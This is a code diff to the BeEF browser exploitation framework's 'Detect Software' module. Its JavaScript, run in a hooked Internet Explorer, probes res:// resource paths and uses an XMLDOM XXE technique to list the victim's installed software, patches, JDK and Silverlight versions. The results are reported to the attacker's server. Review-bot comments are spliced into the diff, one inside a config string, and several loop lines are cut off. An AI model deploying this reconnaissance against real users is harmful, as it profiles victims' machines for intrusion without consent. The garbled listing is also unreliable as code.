Labs\\ZoneAlarm\\alert.zap/2/176'], + + // The following signatures were taken from: + // https://www.alienvault.com/blogs/labs-research/attackers-abusing-internet-explorer-to-enumerate-software-and-detect-securi + 
["Microsoft Office 97", "Microsoft Office\\OFFICE\\BINDER.EXE/16/1"], + ["Microsoft Office 2000", "Microsoft Office\\OFFICE\\WINWORD.EXE/16/1"], + ["Microsoft Office XP", "Microsoft Office\\OFFICE10\\WINWORD.EXE/16/1"], + ["Microsoft Office 2003", "Microsoft Office\\OFFICE11\\WINWORD.EXE/16/1"], + ["Microsoft Office 2007", "Microsoft Office\\OFFICE12\\WINWORD.EXE/16/1"], + ["Microsoft Office 2010", "Microsoft Office\\OFFICE14\\WINWORD.EXE/16/1"], + ["WPS Office Personal", "Kingsoft\\WPS Office Personal\\utility\\repairinst.exe/16/1"], + ["WPS Office 2008", "Kingsoft\\WPS Office 2008\\utility\\repairinst.exe/16/1"], + ["WPS Office 2009", "Kingsoft\\WPS Office 2009\\utility\\repairinst.exe/16/1"], + ["WPS Office 2010", "Kingsoft\\WPS Office 2010\\utility\\repairinst.exe/16/1"], + ["WinRar 3.5", "WinRAR\\WinRar.exe/6/90"], + ["WinRar 3.6", "WinRAR\\WinRar.exe/6/91"], + ["WinRar 3.7", "WinRAR\\WinRar.exe/6/92"], + ["WinRar 3.8", "WinRAR\\WinRar.exe/6/93"], + ["WinRar 3.9", "WinRAR\\RarExt.d11/24/2"], + ["WinZip", "WinZip\\WinZip32.exe/16/1"], + ["7zip", "7—Zip\\7zFm.exe/16/1"], + ["Adobe Reader 7", "Adobe\\Reader 7.0\\Reader\\AXEParser.d11/16/1"], + ["Adobe Professional 7", "Adobe\\Acrobat 7.0\\Acrobat\\Acrobat.dll/16/1"], + ["Adobe Reader 8", "Adobe\\Reader 8.0\\Reader\\AdobeXMP.d11/16/1"], + ["Adobe Reader 9", "Adobe\\Reader 9.0\\Reader\\AcroRd32.exe/16/1"], + ["Adobe Reader 10", "Adobe\\Reader 10.0\\Reader\\AcroRd32.exe/16/1"], + ["Skype", "Skype\\Phone\\Skype.exe/16/1"], + ["Skype", "Skype\\Phone\\sktransfer.d11/16/1"], + ["Microsoft Outlook 6", "Outlook Express\\msimn.exe/16/1"], + ["Microsoft Outlook 2000", "Microsoft Office\\OFFICE\\OUTLOOK.EXE/16/1"], + ["Microsoft Outlook XP", "Microsoft Office\\OFFICE10\\OUTLOOK.EXE/16/1"], + ["Microsoft Outlook 2003", "Microsoft Office\\OFFICE11\\OUTLOOK.EXE/16/1"], + ["Microsoft Outlook 2007", "Microsoft Office\\OFFICE12\\OUTLOOK.EXE/16/1"], + ["Microsoft Outlook 2010", "Microsoft Office\\OFFICE14\\OUTLOOK.EXE/16/1"], + 
["Yahoo Messenger", "Yahoo!\\Messenger\\YahooMessenger.exe/16/1"], + ["Yahoo Messenger 5", "Yahoo!\\Messenger\\YPager.exe/16/1"], + ["Yahoo Messenger 6", "Yahoo!\\Messenger\\asw.d11/16/1"], + ["Yahoo Messenger 7", "Yahoo!\\Messenger\\yxtldr.d11/16/1"], + ["Yahoo Messenger 8", "Yahoo!\\Messenger\\P2PCE.d11/16/1"], + ["Yahoo Messenger 9", "Yahoo!\\Messenger\\GIPSVoiceEngineDLL_MD.d11/16/1"], + ["Yahoo Messenger 10", "Yahoo!\\Messenger\\ConnectionWizard.d11/16/1"], + ["Flashget", "FlashGet\\flashget.exe/16/1"], + ["Flashget", "FlashGet Network\\FlashGet 3\\Flashget3.exe/16/1"], + ["Thunder", "Thunder Network\\Thunder\\Thunder.exe/16/1"], + ["Thunder", "Thunder Network\\Thunder\\Program\\Thunder.exe/16/1"], + ["Thunder", "Thunder Network\\Thunder6\\Thunder.exe/16/1"], + ["eMule", "eMule\\emule.exe/16/1"], + ["eMule", "easyMule2\\easyMule.exe/16/1"], + ["BT", "BitComet\\BitComet.exe/16/1"], + ["QDownload", "Tencent\\QQDownload\\QQDownload.exe/16/1"], + ["BitSpirit", "BitSpirit\\BitSpirit.exe/16/1"], + ["Serv—U", "RhinoSoft.com\\Serv—U\\Serv—U.exe/16/1"], + ["radmin", "Radmin\\radmin.exe/16/1"], + + // The following signatures were taken from AttackAPI + // https://code.google.com/p/attackapi/source/browse/tags/attackapi-2.5.0b/lib/dom/signatures.js + ['L0pht Crack 5', '@stake\\LC5\\lc5.exe/#2/#102'], + ['Adobe Acrobat 7', 'adobe\\acrobat 7.0\\acrobat\\acrobat.dll/#2/#210'], + ['Ahead Nero', 'ahead\\nero\\nero.exe/#2/NEROSESPLASH'], + ['Azureus', 'azureus\\uninstall.exe/#2/#110'], + ['Cain', 'cain\\uninstal.exe/#2/#106'], + ['Citrix', 'Citrix\\icaweb32\\mfc30.dll/#2/#30989'], + ['PGP Desktop', 'PGP Corporation\\PGP Desktop\\PGPdesk.exe/#2/#600'], + ['Google Toolbar', 'Google\\googleToolbar1.dll/#2/#120'], + ['Flash MX 2004', 'Macromedia\\Flash MX 2004\\flash.exe/#2/#4395'], + ['MSN Messenger', 'Messenger\\msmsgs.exe/#2/#607'], + ['Microsoft Live Meeting 7', 'Microsoft Office\\live meeting 7\\console\\7.5.2302.14\\pwresources_zh_tt.dll/#2/#9006'], + ['Microsoft Excel 
2003', 'Microsoft Office\\Office11\\excel.exe/#34/#904'], + ['Microsoft Office 2003', 'Microsoft Office\\Office11\\1033\\MSOhelp.exe/#2/201'], + ['Microsoft Visual Studio 8', 'Microsoft Visual Studio 8\\common7\\ide\\devenv.exe/#2/#6606'], + ['Microsoft Movie Maker', 'Movie Maker\\moviemk.exe/RT_JPG/sample1'], + ['Picasa2', 'picasa2\\picasa2.exe/#2/#138'], + ['Quicktime', 'quicktime\\quicktimeplayer.exe/#2/#403'], + ['Real VNC4', 'RealVNC\\VNC4\\vncviewer.exe/#2/#120'], + ['OLE View', 'Resource Kit\\oleview.exe/#2/#2'], + ['Secure CRT', 'SecureCRT\\SecureCRT.exe/#2/#224'], + ['Symantec Antivirus', 'symantec_client_security\\symantec antivirus\\vpc32.exe/#2/#157'], + ['Ultramon', 'ultramon\\ultramondesktop.exe/#2/#108'], + ['VMware Workstation', 'vmware\\vmware workstation\\vmware.exe/#2/#508'], + ['Winamp', 'winamp\\winamp.exe/#2/#109'], + ['Windows Media Player', 'Windows Media Player\\wmsetsdk.exe/#2/#249'] + ]; + + beef.debug("[Detect Software] Enumerating installed software..."); + for (var dir=0;dir", <%= @command_id %>, "installed_software=" + this.title); dom.removeChild(this); } + img.onerror= function() { dom.removeChild(this); } + dom.appendChild(img); + } + } + + // Enumerate Java JDK installs + beef.debug("[Detect Software] Enumerating JDK installs..."); + var java_versions = ['1.8.0', '1.7.0', '1.6.0']; + for (var dir=0;dir", <%= @command_id %>, "installed_software=" + this.title); dom.removeChild(this); } + img.onerror= function() { dom.removeChild(this); } + dom.appendChild(img); + } + } + } + + // Enumerate Silverlight installs + beef.debug("[Detect Software] Enumerating Silverlight installs..."); + var silverlight_versions = [ + '5.1.50901.0', + '5.1.50709.0', + '5.1.50428.0', + '5.1.41212.0', + '5.1.41105.0', + '5.1.40728.0', + '5.1.40416.0', + '5.1.31211.0', + '5.1.30514.0', + '5.1.30214.0', + '5.1.20913.0', + '5.1.20513.0', + '5.1.20125.0', + '5.1.10411.0', + '5.0.61118.0', + '5.0.60818.0', + '5.0.60401.0', + '4.1.10329.0', + '4.1.10111.0', + 
'4.0.60831.0', + '4.0.60531.0', + '4.0.60310.0', + '4.0.60129.0', + '4.0.51204.0', + '4.0.50917.0', + '4.0.50826.0', + '4.0.50524.00', + '4.0.50401.00', + '3.0.50611.0', + '3.0.50106.00', + '3.0.40818.00', + '3.0.40723.00', + '3.0.40624.00', + '2.0.40115.00', + '2.0.31005.00', + '1.0.30715.00', + '1.0.30401.00', + '1.0.30109.00', + '1.0.21115.00', + '1.0.20816.00' + ]; + + for (var dir=0;dir", <%= @command_id %>, "installed_software=Microsoft Silverlight v" + this.title); dom.removeChild(this); } + img.onerror= function() { dom.removeChild(this); } + dom.appendChild(img); + } + } }); + diff --git a/modules/host/detect_software/config.yaml b/modules/host/detect_software/config.yaml index a6bfd4200..6e04def38 100644 --- a/modules/host/detect_software/config.yaml +++ b/modules/host/detect_software/config.yaml @@ -3,14 +3,15 @@ # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # + beef: module: - Detect_software: + detect_software: enable: true category: "Host" name: "Detect Software" - description: "Detects software installed on the host (Internet Explorer only)" - authors: ["mh"] + description: "This module attempts to detect software installed on the host by using Internet Explorer XMLDOM XXE discovered by Soroush Dalili (@irsdl).
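Review bot: In `detect_folder`, `dtd` is built from `path` but never referenced and `xml` is the empty string, so as rendered every call parses an empty document and the probed path never reaches the parser; if this listing stripped markup from the `xml` literal, that construction should still carry a comment such as `// external reference to the probed folder; load failure vs. success distinguishes present from absent` so the next reader can tell what is being tested. The function also returns true on any exception from `loadXML`, so an error unrelated to the probed path would be reported as a hit for every entry, and the `program_dirs` loop only establishes that a known folder is detected, not that a missing one is rejected. Separately, `patches` and `software` are each declared twice with `var` (the `res` fallback reuses both names) and the `img.onload`/`img.onerror` pair is repeated for patches, software, JDK and Silverlight; distinct names for the fallback arrays (e.g. `res_patches`, `res_software`) and one image-probe helper would make the two techniques easier to follow. Several loop headers appear truncated in this listing (`for (var i=0; i", …`), so the exact loop bodies could not be checked.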

If the XMLDOM XXE technique fails, the module falls back to using the 'res' protocol handler to load known resource images from EXE/DLL files.

It also attempts to enumerate installed patches if service pack uninstall files are present on the host (WinXP only)."
+ authors: ["bcoles"]
 target:
 working: ["IE"]
- not_working: ["All"]
+ not_working: ["ALL"]
diff --git a/modules/host/detect_software/module.rb b/modules/host/detect_software/module.rb
index 08095c52e..55ccaf1f0 100644
--- a/modules/host/detect_software/module.rb
+++ b/modules/host/detect_software/module.rb
@@ -3,12 +3,14 @@
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
+
 class Detect_software < BeEF::Core::Command
-
+
 def post_execute
 content = {}
- content['detect_software'] = @datastore['detect_software']
+ content['installed_software'] = @datastore['installed_software'] if not @datastore['installed_software'].nil?
+ content['installed_patches'] = @datastore['installed_patches'] if not @datastore['installed_patches'].nil?
 save content
 end
-
+
 end
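Review bot: `post_execute` saves `content` unconditionally, so a result carrying neither `installed_software` nor `installed_patches` is stored as an empty hash — and command.js also reports `fail=unsupported browser`, which this method never reads, so that outcome is presumably dropped from the saved results. Consider `content['fail'] = @datastore['fail'] unless @datastore['fail'].nil?` and `save content unless content.empty?`. The two `if not ….nil?` guards read more idiomatically as `unless`, e.g. `content['installed_software'] = @datastore['installed_software'] unless @datastore['installed_software'].nil?`.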